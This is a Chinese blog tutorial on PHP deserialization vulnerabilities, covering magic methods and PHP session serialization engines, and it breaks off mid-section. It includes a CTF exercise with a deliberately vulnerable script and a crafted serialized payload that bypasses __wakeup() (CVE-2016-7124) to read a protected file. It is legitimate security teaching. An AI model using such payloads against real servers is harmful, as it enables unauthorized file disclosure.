

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
 <meta name="referrer" content="no-referrer"/>
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="学习一下PHP反序列化漏洞。">
  <meta name="author" content="Eggs">
  <meta name="keywords" content="Blog">
  
  <title>PHP反序列化漏洞 - 蛋窝窝</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.6.0/styles/atelier-sulphurpool-light.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->

  
<link rel="stylesheet" href="/css/diy/diy.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"2693993651.github.io","root":"/","version":"1.8.10","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":"§ "},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>蛋窝窝 •ᴗ•Hi~</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default0.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="PHP反序列化漏洞">
              
            </span>

            
              <div class="mt-3">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-author" aria-hidden="true"></i>
      Eggs
    </span>
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-04-16 14:41" pubdate>
        2022年4月16日 下午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      5.3k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      63
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">PHP反序列化漏洞</h1>
            
            <div class="markdown-body">
              <p>学习一下PHP反序列化漏洞。</p>
<span id="more"></span>

<hr>
<h3 id="0x00序列化与反序列化"><a href="#0x00序列化与反序列化" class="headerlink" title="0x00序列化与反序列化"></a>0x00序列化与反序列化</h3><h4 id="基本概念介绍"><a href="#基本概念介绍" class="headerlink" title="基本概念介绍"></a>基本概念介绍</h4><p>首先，什么是序列化与反序列化？</p>
<p>程序要处理数据，总要让数据有个规范吧，方便数据的存储与转移。而业务要求这么广，需要处理的数据千奇百怪，怎么规范一下呢，这就是通过序列化来实现的。</p>
<p><strong>序列化就是将一个对象转换成字符串</strong>（php中即通过serialize()函数），字符串就方便处理了。而这字符串就代表了经历序列化处理之前的那个对象。想也知道，这串字符串就必须含有对象的一些“特点”，包括了这个对象的<strong>属性名、属性值、属性类型和对象对应的类名</strong>，注意序列化不保存方法。</p>
<p>而<strong>反序列化就是将这串字符串还原为对象</strong>。</p>
<table>
<thead>
<tr>
<th align="left">类型</th>
<th align="left">过程</th>
</tr>
</thead>
<tbody><tr>
<td align="left">序列化</td>
<td align="left">对象—&gt; 字符串</td>
</tr>
<tr>
<td align="left">反序列化</td>
<td align="left">字符串—&gt;对象</td>
</tr>
</tbody></table>
<p><em>也可以对数组进行序列化与反序列化操作</em></p>
<h4 id="代码实例演示"><a href="#代码实例演示" class="headerlink" title="代码实例演示"></a>代码实例演示</h4><p>现有a.php，代码如下</p>
<figure class="highlight php"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br>    <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">person</span></span>&#123;<br>        <span class="hljs-keyword">public</span> <span class="hljs-variable">$sex</span>;<br>        <span class="hljs-keyword">public</span> <span class="hljs-variable">$name</span>;<br>        <span class="hljs-keyword">public</span> <span class="hljs-variable">$age</span>; <br>    &#125;<br>    <span class="hljs-variable">$npc1</span>=<span class="hljs-keyword">new</span> person(); <span class="hljs-comment">//实例化一个对象</span><br>    <span class="hljs-variable">$npc1</span>-&gt;sex=<span class="hljs-string">&#x27;man&#x27;</span>;<br>    <span class="hljs-variable">$npc1</span>-&gt;name=<span class="hljs-string">&#x27;eggs&#x27;</span>;<br>    <span class="hljs-variable">$npc1</span>-&gt;age=<span class="hljs-number">9</span>;<br>    <span class="hljs-keyword">echo</span> serialize(<span class="hljs-variable">$npc1</span>);<br>    <br><span class="hljs-meta">?&gt;</span><br><br></code></pre></div></td></tr></table></figure>

<p>这里定义了一个<code>person</code>类，实例化了一个<code>npc1</code>对象，赋予其一些属性值，将其序列化后输出。</p>
<p><code>O:6:&quot;person&quot;:3:&#123;s:3:&quot;sex&quot;;s:3:&quot;man&quot;;s:4:&quot;name&quot;;s:4:&quot;eggs&quot;;s:3:&quot;age&quot;;i:&quot;9&quot;;&#125;</code></p>
<p>在这串输出结果中，</p>
<ul>
<li><p><code> O</code>，代表对象，因为这里序列化的是一个对象，如果序列化的是数组的话，这里为A</p>
</li>
<li><p><code>6</code>，代表类的长度为6个字符，这里即是<code>person</code></p>
</li>
<li><p><code>&quot;person&quot;</code>，代表类名为<code>person</code></p>
</li>
<li><p><code>3</code>，代表类中有3个属性</p>
</li>
<li><p><code>s</code>，代表属性的类型为字符串<code>string</code>，<code>i</code>则代表类型为<code>int</code></p>
</li>
<li><p><code>3</code>，代表属性名长度为3。</p>
<blockquote>
<p>需要注意的是变量受到不同修饰符（public，private，protected）修饰进行序列化时，序列化后变量的长度和名称会发生变化。</p>
<p>public修饰的为正常长度，private修饰的会在属性两侧加入空字节<code>\00</code>，长度加2，protected修饰的会在属性前加入<code>\00*\00</code>，长度加3。</p>
</blockquote>
</li>
<li><p><code>&quot;sex&quot;</code>，代表属性名为<code>sex</code>，而后面的<code>&quot;man&quot;</code>代表属性值为<code>man</code>。虽然属性的名称和属性的值表示方法一样，但连在一起仍能体现键值对的关系</p>
</li>
</ul>
<p>将刚才得到的序列化后的字符串通过<code>unserialize()</code>反序列化，又能得到原对象。</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220416155515.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="0x01魔术方法"><a href="#0x01魔术方法" class="headerlink" title="0x01魔术方法"></a>0x01魔术方法</h3><p>满足条件自动调用的方法为魔术方法，形式为左边两条下划线，<code>__xxx</code>。</p>
<p>在PHP中进行序列化与反序列化操作时，往往会触发一些魔术方法。这些魔术方法本意是用干预序列化和反序列化流程和结果的，但攻击者可以通过检查方法魔术方法里有无敏感操作，从而进行利用。</p>
<h4 id="魔术方法一览"><a href="#魔术方法一览" class="headerlink" title="魔术方法一览"></a>魔术方法一览</h4><p>PHP反序列化漏洞中可能会用到的魔术方法：</p>
<ul>
<li><p>__sleep() 序列化时触发，详见下文</p>
</li>
<li><p>__wakeup() 反序列化时触发，详见下文</p>
</li>
<li><p>__toString() 被当作字符串处理时触发，详见下文</p>
</li>
<li><p>__construct() 创建对象时触发</p>
</li>
<li><p>__destruct() 销毁对象时触发</p>
</li>
<li><p>__call() 在对象上下文中调用不可访问的方法时触发</p>
</li>
<li><p>__callStatic() 在静态上下文中调用不可访问的方法时触发</p>
</li>
<li><p>__get() 用于从不可访问的属性读取数据</p>
</li>
<li><p>__set() 用于将数据写入不可访问的属性</p>
</li>
<li><p>__unset() 在不可访问的属性上使用unset()时触发</p>
</li>
<li><p>__invoke() 当脚本尝试将对象调用为函数时触发</p>
</li>
</ul>
<h4 id="重点魔术方法"><a href="#重点魔术方法" class="headerlink" title="重点魔术方法"></a>重点魔术方法</h4><ul>
<li><p>__sleep() </p>
<p>serialize() 函数会检查类中是否存在魔术方法 __sleep()。如果存在，该方法会先被调用，然后才执行序列化操作。__sleep()返回一个数组，只有该数组中的元素会进行序列化操作。实例如下：</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220416165615.png" srcset="/img/loading.gif" lazyload></p>
<p>可以看到__sleep()返回的属性名是不会进行序列化操作的，其它属性进行序列化操作。</p>
</li>
<li><p>__wakeup() </p>
<p>unserialize() 会检查是否存在一个 __wakeup() 方法。如果存在，则会先调用 __wakeup 方法，预先准备对象需要的资源，返回void。常用于反序列化操作中重新建立数据库连接或执行其它初始化操作。实例：</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220416191620.png" srcset="/img/loading.gif" lazyload></p>
<p>就是在调用unserialize()时调用__wakeup()中的内容</p>
</li>
<li><p>toString() 当一个对象被当作一个字符串时被调用，返回字符串，例如echo打印出对象就会调用此方法。实例：</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220416192133.png" srcset="/img/loading.gif" lazyload>触发__toString里的方法，并返回一串字符串作为触发该方法的输入（因为这是被当作字符串处理才会触发的方法嘛)。</p>
</li>
<li><p>__construct()和__destruct()也较常拿来利用，比较简单，一个在创建对象时触发（但执行反序列化时，生成的对象<strong>并不会</strong>触发），一个在销毁对象（流程：反序列化生成一个对象，程序执行完毕，对象自动销毁）时触发，不再赘述</p>
</li>
</ul>
<h3 id="0x02绕过-wakeup"><a href="#0x02绕过-wakeup" class="headerlink" title="0x02绕过__wakeup()"></a>0x02绕过__wakeup()</h3><p><strong>CVE-2016-7124 版本限制：<code>PHP5:&lt;5.6.25</code> <code>PHP7:&lt;7.0.10</code></strong></p>
<p>一道来自吸提爱富中的例题</p>
<p>反序列化时，如果表示对象属性个数的值大于真实的属性个数时就会跳过<code>__wakeup( )</code>的执行。</p>
<p>例题：</p>
<figure class="highlight php"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>    error_reporting(<span class="hljs-number">0</span>);<br>    <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">secret</span></span>&#123;<br>        <span class="hljs-keyword">private</span> <span class="hljs-variable">$file</span>=<span class="hljs-string">&#x27;index.php&#x27;</span>;<br><br>        <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"><span class="hljs-variable">$file</span></span>)</span>&#123;<br>            <span class="hljs-keyword">$this</span>-&gt;file=<span class="hljs-variable">$file</span>;<br>        &#125;<br><br>        <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span>&#123;<br>            <span class="hljs-keyword">echo</span> show_source(<span class="hljs-keyword">$this</span>-&gt;file,<span class="hljs-literal">true</span>);<br>        &#125;<br><br>        <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>)</span>&#123;<br>            <span class="hljs-keyword">$this</span>-&gt;file=<span class="hljs-string">&#x27;index.php&#x27;</span>;<br>        &#125;<br>    &#125;<br><br>    <span class="hljs-variable">$cmd</span>=cmd00;<br>    <span class="hljs-keyword">if</span> (!<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-variable">$cmd</span>]))&#123;<br>        <span class="hljs-keyword">echo</span> show_source(<span class="hljs-string">&#x27;index.php&#x27;</span>,<span class="hljs-literal">true</span>);<br>    &#125;<br>    <span class="hljs-keyword">else</span>&#123;<br>        <span class="hljs-variable">$cmd</span>=base64_decode(<span class="hljs-variable">$_GET</span>[<span class="hljs-variable">$cmd</span>]);<br>        <span class="hljs-keyword">if</span> ((preg_match(<span class="hljs-string">&#x27;/[oc]:\d+:/i&#x27;</span>,<span class="hljs-variable">$cmd</span>))||(preg_match(<span class="hljs-string">&#x27;/flag/i&#x27;</span>,<span class="hljs-variable">$cmd</span>)))&#123;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;Are u gaoshing?&quot;</span>;<br>        &#125;<br>        <span class="hljs-keyword">else</span>&#123;<br>            unserialize(<span class="hljs-variable">$cmd</span>);<br>        &#125;<br>    &#125;<br><span class="hljs-meta">?&gt;</span><br><span class="hljs-comment">//secret in the_next.php</span><br></code></pre></div></td></tr></table></figure>

<p>源码看一下，可以知道前半截定义了一个<code>sercet</code>类，其中有__construct()、__destruct()、__wakeup()方法。我们需要构造一个序列化字符串上传，在这里如果我们想要看到指定文件的源码，就需要利用__destruct()方法，而该方法在程序完成时会自动触发的。又根据末尾的注释提示，这要求我们所构造的反序列化字符串中的<code>file</code>属性值为<code>the_next.php</code>。但是又因为存在__wakeup()函数，导致在序列化后触发该函数，我们构造的参数变成了<code>index.php</code>，文件读取失败。所以这里的关键即是执行反序列化时绕过__wakeup()的执行。</p>
<p>强调一下知识点：<strong>反序列化时，如果表示对象属性个数的值大于真实的属性个数时就会跳过<code>__wakeup( )</code>的执行</strong></p>
<p>所以，我们先复制一下这个<code>secret</code>的定义，new一个对象使其属性值为<code>the_next.php</code>，然后再生成一下该对象的的序列化字符串。</p>
<figure class="highlight php"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>  error_reporting(<span class="hljs-number">0</span>); <br>    <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">secret</span></span>&#123;<br>        <span class="hljs-keyword">private</span> <span class="hljs-variable">$file</span>=<span class="hljs-string">&#x27;index.php&#x27;</span>;<br><br>        <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"><span class="hljs-variable">$file</span></span>)</span>&#123;<br>            <span class="hljs-keyword">$this</span>-&gt;file=<span class="hljs-variable">$file</span>;<br>        &#125;<br><br>        <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span>&#123;<br>            <span class="hljs-keyword">echo</span> show_source(<span class="hljs-keyword">$this</span>-&gt;file,<span class="hljs-literal">true</span>);<br>        &#125;<br><br>        <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>)</span>&#123;<br>            <span class="hljs-keyword">$this</span>-&gt;file=<span class="hljs-string">&#x27;index.php&#x27;</span>;<br>        &#125;<br>    &#125;<br><br>    <span class="hljs-variable">$payload</span>=<span class="hljs-keyword">new</span> secret(<span class="hljs-string">&quot;the_next.php&quot;</span>);<br>    <span class="hljs-keyword">echo</span> serialize(<span class="hljs-variable">$payload</span>);<br>    <br><span class="hljs-meta">?&gt;</span><br></code></pre></div></td></tr></table></figure>

<p>生成的序列化字符串为</p>
<p><code>O:6:&quot;secret&quot;:1:&#123;s:12:&quot;secretfile&quot;;s:12:&quot;the_next.php&quot;;&#125;</code></p>
<p>为了使其绕过__wakeup()，改为</p>
<p><code>O:6:&quot;secret&quot;:2:&#123;s:12:&quot;secretfile&quot;;s:12:&quot;the_next.php&quot;;&#125;</code></p>
<p>至于后半截，我们上传的参数为<code>cmd</code>，需要base64加密再用<code>+</code>绕过正则就可以了，这里不是重点不再赘述。</p>
<h3 id="0x03PHP-session反序列化漏洞"><a href="#0x03PHP-session反序列化漏洞" class="headerlink" title="0x03PHP session反序列化漏洞"></a>0x03PHP session反序列化漏洞</h3><p>在讨论session反序列化漏洞之前，我们先补充一下有关PHP session的知识</p>
<p><em>该章节部分来自<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/6640#toc-1">https://xz.aliyun.com/t/6640#toc-1</a></em> <em>并整合了一些我个人理解。</em></p>
<h4 id="PHP-session相关"><a href="#PHP-session相关" class="headerlink" title="PHP session相关"></a>PHP session相关</h4><h6 id="PHP-session介绍"><a href="#PHP-session介绍" class="headerlink" title="PHP session介绍"></a>PHP session介绍</h6><p><code>session</code>一般称为“会话控制“，简单来说就是是一种客户与网站/服务器更为安全的对话方式。一旦开启了 <code>session</code> 会话，便可以在网站的任何页面使用或保持这个会话，从而让访问者与网站之间建立了一种“对话”机制。不同语言的会话机制可能有所不同，这里仅讨论<code>PHP session</code>机制。</p>
<p><code>PHP session</code>可以看做是一个特殊的变量，且该变量是用于存储关于用户会话的信息，或者更改用户会话的设置，需要注意的是，<code>PHP Session</code> 变量存储单一用户的信息，并且对于应用程序中的所有页面都是可用的，且其对应的具体 <code>session</code> 值会存储于服务器端，这也是与 <code>cookie</code>的主要区别，所以<code>seesion</code> 的安全性相对较高</p>
<h6 id="PHP-session-的工作流程"><a href="#PHP-session-的工作流程" class="headerlink" title="PHP session 的工作流程"></a>PHP session 的工作流程</h6><p>当开始一个会话时，PHP会尝试从请求中查找会话ID（通常通过会话<code>cookie</code>，然后是<code>Get</code>、<code>Pos</code>t中），如果不存在则开启会话，生成session文件来完成”会话控制“，如果存在，则表示之前已经开启过会话了，PHP就会根据这个ID找到session文件，<strong>反序列化</strong>该文件来读取数据，以此完成”会话控制“。</p>
<p>我们需要关注的重点在于怎么生成session文件，以及该文件是怎么存储保存的（剧透：刚刚说了通过反序化读取，那么就是通过序列化的方式保存）。</p>
<p>回到会话开始时，没有sessionID的情况。PHP此时会自动调用<code>php_session_create_id</code>函数创建一个新的会话，并且在<code>http response</code>中通过<code>set-cookie</code>头部发送给客户端保存。</p>
<p><em>微博🐶都不用，我之前自然是没有与它建立会话的（玩笑而已不必当真，花花世界迷人眼，寸寸屏幕乱我心）。</em>所以我这里抓取了我登录微博时的数据包。</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220416214023.png" srcset="/img/loading.gif" lazyload></p>
<p>可以看到在response报文中看到<code>set-cookie</code>头部</p>
<p><em>有时候浏览器用户设置会禁止 <code>cookie</code>，当在客户端<code>cookie</code>被禁用的情况下，php也可以自动将<code>session id</code>添加到url参数中以及<code>form</code>的<code>hidden</code>字段中，但这需要将<code>php.ini</code>中的<code>session.use_trans_sid</code>设为开启，也可以在运行时调用<code>ini_set</code>来设置这个配置项。</em></p>
<p>会话开始后，这也就是PHP SESSION发挥作用的时候，这时让会将会话中的数据设置到 <code>$_SESSION</code> 之中，方便数据读取。</p>
<p>如下述代码就是一个在 <code>$_SESSION</code> 变量中注册变量的例子</p>
<figure class="highlight php"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>session_start();<br><span class="hljs-keyword">if</span> (!<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;username&#x27;</span>])) &#123;<br>  <span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;username&#x27;</span>] = <span class="hljs-string">&#x27;xianzhi&#x27;</span> ;<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></div></td></tr></table></figure>

<p>接下来是“善后阶段”，也就是<code>$_SESSION</code> 用完了，要保存起来方便下次直接用。</p>
<p>会话停止后，PHP 就会自动读取<code>$_SESSION</code>中的内容，并将其进行<strong>序列化</strong>，然后发送给会话保存管理器来进行保存。</p>
<p>默认情况下，PHP 使用内置的文件会话保存管理器来完成<code>session</code>的保存，也可以通过配置项 <code>session.save_handler</code> 来修改所要采用的会话保存管理器。 对于文件会话保存管理器，会将会话数据保存到配置项<code>session.save_path</code>所指定的位置。</p>
<p>整个流程大概如上所述，也可参考下述流程图：</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220416215209.png" srcset="/img/loading.gif" lazyload></p>
<h6 id="PHP-session存储的相关配置"><a href="#PHP-session存储的相关配置" class="headerlink" title="PHP session存储的相关配置"></a>PHP session存储的相关配置</h6><p>从上文中我们可以得知，PHP在session存储和读取时,都会有一个序列化和反序列化的过程。在php.ini中有以下配置项，决定了如何执行序列化相关操作。</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220417143356.png" srcset="/img/loading.gif" lazyload></p>
<p><code>session.save_path</code> 设置session的存储路径<br><code>session.save_handler</code> 设定用户自定义存储函数<br><code>session.auto_start</code> 指定会话模块是否在请求开始时启动一个会话<br><code>session.serialize_handler</code> 定义用来序列化/反序列化的处理器名字。默认使用php</p>
<p>除了默认的session序列化引擎php外，还有几种引擎，不同引擎存储方式不同</p>
<table>
<thead>
<tr>
<th>处理器名称</th>
<th>存储格式</th>
</tr>
</thead>
<tbody><tr>
<td>php</td>
<td>键名 + 竖线 + 经过<code>serialize()</code>函数序列化处理的值</td>
</tr>
<tr>
<td>php_binary</td>
<td>键名的长度对应的 ASCII 字符 + 键名 + 经过<code>serialize()</code>函数序列化处理的值</td>
</tr>
<tr>
<td>php_serialize</td>
<td>经过serialize()函数序列化处理的<strong>数组</strong></td>
</tr>
</tbody></table>
<p><code>PHP session</code>默认是以文件的方式存储，且存储的文件是由<code>sess_sessionid</code>来决定文件名的。当然，文件的内容始终是session值的序列化之后的内容。</p>
<h6 id="PHP-session的存储机制"><a href="#PHP-session的存储机制" class="headerlink" title="PHP session的存储机制"></a>PHP session的存储机制</h6><p>上文中提到了 <code>PHP session</code>的存储机制是由<code>session.serialize_handler</code>来定义引擎的，下面我们实例来看看三种不同处理器序列化后的结果</p>
<p>测试demo.php：</p>
<figure class="highlight php"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br> <span class="hljs-comment">// ini_set(&#x27;session.serialize_handler&#x27;,&#x27;php&#x27;);</span><br> <span class="hljs-comment">// ini_set(&#x27;session.serialize_handler&#x27;,&#x27;php_binary&#x27;);</span><br> <span class="hljs-comment">// ini_set(&#x27;session.serialize_handler&#x27;,&#x27;php_serialize&#x27;);</span><br> <span class="hljs-comment">// 修改对应设置来改变序列化引擎</span><br>    session_start();<br>    <span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;test&#x27;</span>] = <span class="hljs-string">&#x27;eggs&#x27;</span>;<br><span class="hljs-meta">?&gt;</span><br></code></pre></div></td></tr></table></figure>

<p><strong>PHP引擎</strong></p>
<p>序列化<code> $_SESSION[&#39;test&#39;] = &#39;eggs&#39;</code>的结果为<code>test|s:4:&quot;eggs&quot;;</code></p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220417145044.png" srcset="/img/loading.gif" lazyload></p>
<p><strong>php_binary引擎</strong></p>
<p>序列化<code> $_SESSION[&#39;test&#39;] = &#39;eggs&#39;</code>的结果为<code>EOTtests:4:&quot;eggs&quot;;</code></p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220417145905.png" srcset="/img/loading.gif" lazyload></p>
<p>注意这个<code>EOT</code>是 值为4，等于键名<code>test</code>的字符长度。</p>
<p>该值为不可打印的ASCII 字符字符，如果将键名长度换成其它长度的话结果如下</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220417150248.png" srcset="/img/loading.gif" lazyload></p>
<p>第一个值为H，表示键名长度为72</p>
<p><strong>php_serialize引擎</strong></p>
<p>序列化<code> $_SESSION[&#39;test&#39;] = &#39;eggs&#39;</code>的结果为<code>a:1:&#123;s:4:&quot;test&quot;;s:4:&quot;eggs&quot;;&#125;</code></p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220417150619.png" srcset="/img/loading.gif" lazyload></p>
<p>这种形式与之前在普通PHP文件里进行的序列化结果一样。</p>
<h4 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h4><h5 id="漏洞概述"><a href="#漏洞概述" class="headerlink" title="漏洞概述"></a>漏洞概述</h5><p><code>php</code>处理器和<code>php_serialize</code>处理器这两个处理器生成的序列化格式本身是没有问题的，但是如果这两个处理器混合起来用，就会造成危害。</p>
